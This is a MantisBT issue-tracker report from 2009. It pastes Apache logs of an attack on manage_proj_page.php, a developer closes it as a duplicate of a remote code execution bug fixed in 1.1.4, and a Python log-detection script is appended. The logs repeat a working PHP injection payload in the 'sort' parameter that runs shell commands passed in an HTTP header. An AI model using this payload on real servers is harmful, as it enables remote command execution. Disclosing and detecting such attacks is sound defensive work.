View Issue Details

ID: 0010025
Project: mantisbt
Category: security
View Status: public
Last Update: 2009-06-26 12:02
Reporter: slashie
Assigned To: jreese
Priority: normal
Severity: minor
Reproducibility: N/A
Status: closed
Resolution: duplicate
Product Version: 1.1.0
Summary: 0010025: Possible hacking attack
Description

Hello!

My current hosting company has reported the following as a hacking attack, as evidenced in the following Apache logs. I am posting this here so maybe the development team notices it and can correct it. It happened on Mantis 1.1.0.

88.191.51.191 - - [07/Jan/2009:08:11:44 -0600] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 4387 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:11:45 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3968 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:11:48 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3934 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:12:00 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 4070 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:12:32 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3915 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:13:16 -0600] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 4387 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:14:17 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3827 "-" "-"
88.191.51.191 - - [07/Jan/2009:08:15:03 -0600] "GET /mantis/manage_proj_page.php?sort=']);}error_reporting(0);print(code);passthru(base64_decode($_SERVER[HTTP_CMD]));die;%23 HTTP/1.0" 200 3827 "-" "-"

Hope it helps,

Gratefully,

Santiago Zapata

Tags: No tags attached.

Relationships

duplicate of | 0009704 | closed | giallu | Remote Code Execution in manage_proj_page.php

Activities

jreese

2009-01-07 13:55

reporter   ~0020555

This has been fixed since 1.1.4. Please upgrade to the latest release of 1.1.6.
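
A log check for the request pattern in the Apache excerpt above, as an added example that is not part of the original report or of MantisBT: it flags requests to manage_proj_page.php whose decoded `sort` value is not a plain identifier. The allowlist pattern, the function name and the sample lines (documentation IPs, harmless stand-in value) are assumptions constructed for illustration.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in the report's Apache log format
# (documentation IPs; the sort value is a harmless stand-in).
SAMPLE = [
    '192.0.2.10 - - [07/Jan/2009:08:11:44 -0600] "GET /mantis/manage_proj_page.php HTTP/1.0" 200 4387 "-" "-"',
    '192.0.2.10 - - [07/Jan/2009:08:11:45 -0600] "GET /mantis/manage_proj_page.php?sort=\']);}print(1);die;%23 HTTP/1.0" 200 3968 "-" "-"',
    '192.0.2.11 - - [07/Jan/2009:08:12:01 -0600] "GET /mantis/manage_proj_page.php?sort=name&dir=ASC HTTP/1.0" 200 4387 "-" "-"',
    'not an access log line',
]

# client, timestamp, request target, status from a common/combined log line.
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "\S+ (.+) HTTP/[\d.]+" (\d{3}) ')
# Assumption: a legitimate sort value is a plain column name.
SAFE_SORT = re.compile(r'[A-Za-z0-9_]*')
PAGE = "/manage_proj_page.php"


def suspicious_sort_requests(lines):
    """Return (client, timestamp, status, decoded sort value) for every request
    to manage_proj_page.php whose sort parameter is not a plain identifier."""
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue  # malformed or unrelated line
        client, when, target, status = m.groups()
        path, _, query = target.partition("?")
        if not path.endswith(PAGE):
            continue
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            value = unquote_plus(value)  # decode %23, +, etc. before checking
            if unquote_plus(key) == "sort" and not SAFE_SORT.fullmatch(value):
                hits.append((client, when, int(status), value))
    return hits


if __name__ == "__main__":
    for client, when, status, value in suspicious_sort_requests(SAMPLE):
        print(f"{when} {client} status={status} sort={value!r}")
```

The status code on a flagged line does not show whether the request had any effect, so hits against an installation older than 1.1.4 need follow-up beyond the access log.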

Issue History

Date Modified Username Field Change
2009-01-07 13:08 slashie New Issue
2009-01-07 13:55 jreese Note Added: 0020555
2009-01-07 13:55 jreese Relationship added duplicate of 0009704
2009-01-07 13:55 jreese Status new => resolved
2009-01-07 13:55 jreese Resolution open => duplicate
2009-01-07 13:55 jreese Assigned To => jreese
2009-06-26 12:02 vboctor Status resolved => closed